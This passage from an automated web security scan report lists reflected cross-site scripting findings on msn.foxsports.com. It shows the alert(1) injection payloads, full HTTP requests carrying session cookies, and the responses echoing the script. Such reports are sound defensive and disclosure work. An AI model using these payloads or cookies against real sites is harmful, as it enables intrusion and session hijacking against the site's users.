deo.createWidget('Player1Container', 'Player', 660, 412, {"cbprefix": "Player.", "configCsid": "Fox%20Sports", "configName": "video_player", "player.defaultVidId": "8dc5fe25-84b5-4135-980a-7636efe6330e87376";alert(1)//1c91713f693", "player.c": "v", "player.v": "8dc5fe25-84b5-4135-980a-7636efe6330e87376";alert(1)//1c91713f693", "player.fr":"iv2_en-us_foxsports_foxflash" }, 'Player1');</script>
...[SNIP]...

3.20. http://msn.foxsports.com/search [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /search

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27954'%3balert(1)//b86974c8f99 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 27954';alert(1)//b86974c8f99 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search?27954'%3balert(1)//b86974c8f99=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: PWS/1.7.1.2
Content-Length: 75928
Content-Type: text/html;charset=UTF-8
X-Px: ms iad-agg-n12 ( iad-agg-n3), ms iad-agg-n3 ( jfk-agg-n52), ms jfk-agg-n52 ( origin>CONN)
Cache-Control: max-age=3564
Expires: Sat, 08 Jan 2011 02:07:22 GMT
Date: Sat, 08 Jan 2011 01:07:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<META http-equiv="Content-Type" conten
...[SNIP]...
;
var clickFunc = function(){
EZDATA.trackGaEvent('search', 'function', 'filter');
window.location='http://msn.foxsports.com/search?&27954';alert(1)//b86974c8f99=1&mediatype=Video';
return false;
};
link.bind("click", clickFunc);
link.html("More Videos ..");
});
...[SNIP]...

3.21. http://msn.foxsports.com/search [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /search

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ae22"%3balert(1)//42904ba53e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5ae22";alert(1)//42904ba53e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search?5ae22"%3balert(1)//42904ba53e8=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: PWS/1.7.1.2
Content-Length: 76056
Content-Type: text/html;charset=UTF-8
X-Px: ms iad-agg-n5 ( iad-agg-n35), ms iad-agg-n35 ( jfk-agg-n58), ms jfk-agg-n58 ( origin>CONN)
Cache-Control: max-age=3600
Expires: Sat, 08 Jan 2011 02:07:54 GMT
Date: Sat, 08 Jan 2011 01:07:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<META http-equiv="Content-Type" conten
...[SNIP]...
mes/foundation/2.10/";
EZDATA.themeUrl = "http://multimedia.foxsports.com/FileResource//themes/projects/foxsports/5.0_5033";
EZDATA.pageUrl = "http://msn.foxsports.com/search?&5ae22";alert(1)//42904ba53e8=1";
EZDATA.baseUrl = "http://multimedia.foxsports.com/";
EZDATA.basePubUrl = "http://multimedia.foxsports.com/";
EZDATA.baseSearchUrl = "http://msn.foxsports.com/se
...[SNIP]...

3.22. http://msn.foxsports.com/search [sp_q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /search

Issue detail

The value of the sp_q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87100</script><script>alert(1)</script>f3d08a24d82 was submitted in the sp_q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search?sp_q=nascar_news87100</script><script>alert(1)</script>f3d08a24d82 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: PWS/1.7.1.2
Content-Length: 67068
Content-Type: text/html;charset=UTF-8
X-Px: ms iad-agg-n18 ( iad-agg-n35), ms iad-agg-n35 ( jfk-agg-n14), ms jfk-agg-n14 ( origin>CONN)
Cache-Control: max-age=3559
Expires: Sat, 08 Jan 2011 02:03:37 GMT
Date: Sat, 08 Jan 2011 01:04:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<META http-equiv="Content-Type" conten
...[SNIP]...
var snippetTruncationLength = itemMainLength/4;
EZDATA.jsLoaderExec(EZDATA, "itemMod_truncate", snippetTruncationLength);
var searchedTerm = "nascar_news87100</script><script>alert(1)</script>f3d08a24d82";
var mediaType = "";
</script>
...[SNIP]...

3.23. http://msn.foxsports.com/video [vid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /video

Issue detail

The value of the vid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 934a7"%3balert(1)//81751046272 was submitted in the vid parameter. This input was echoed as 934a7";alert(1)//81751046272 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video?vid=11488b72-869b-4def-9ea2-d302aaaf2581934a7"%3balert(1)//81751046272 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 204851
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=17
Date: Sat, 08 Jan 2011 00:43:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
deo.createWidget('Player1Container', 'Player', 640, 400, {"cbprefix": "Player.", "configCsid": "Fox%20Sports", "configName": "video_player", "player.defaultVidId": "11488b72-869b-4def-9ea2-d302aaaf2581934a7";alert(1)//81751046272", "player.c": "v", "player.v": "11488b72-869b-4def-9ea2-d302aaaf2581934a7";alert(1)//81751046272" }, 'Player1');</script>
...[SNIP]...

3.24. http://msn.foxsports.com/video/NFL [vid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /video/NFL

Issue detail

The value of the vid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67a15"%3balert(1)//d6d9c871e76 was submitted in the vid parameter. This input was echoed as 67a15";alert(1)//d6d9c871e76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/NFL?vid=fd281445-422f-4072-b9ba-9091be6a810267a15"%3balert(1)//d6d9c871e76&from=foxsports/Home/headlines HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 204035
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=33
Date: Sat, 08 Jan 2011 00:58:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
deo.createWidget('Player1Container', 'Player', 640, 400, {"cbprefix": "Player.", "configCsid": "Fox%20Sports", "configName": "video_player", "player.defaultVidId": "fd281445-422f-4072-b9ba-9091be6a810267a15";alert(1)//d6d9c871e76", "player.c": "v", "player.v": "fd281445-422f-4072-b9ba-9091be6a810267a15";alert(1)//d6d9c871e76" }, 'Player1');</script>
...[SNIP]...

3.25. http://msn.foxsports.com/video/college-football [vid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /video/college-football

Issue detail

The value of the vid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60927"%3balert(1)//893fe2fe98 was submitted in the vid parameter. This input was echoed as 60927";alert(1)//893fe2fe98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

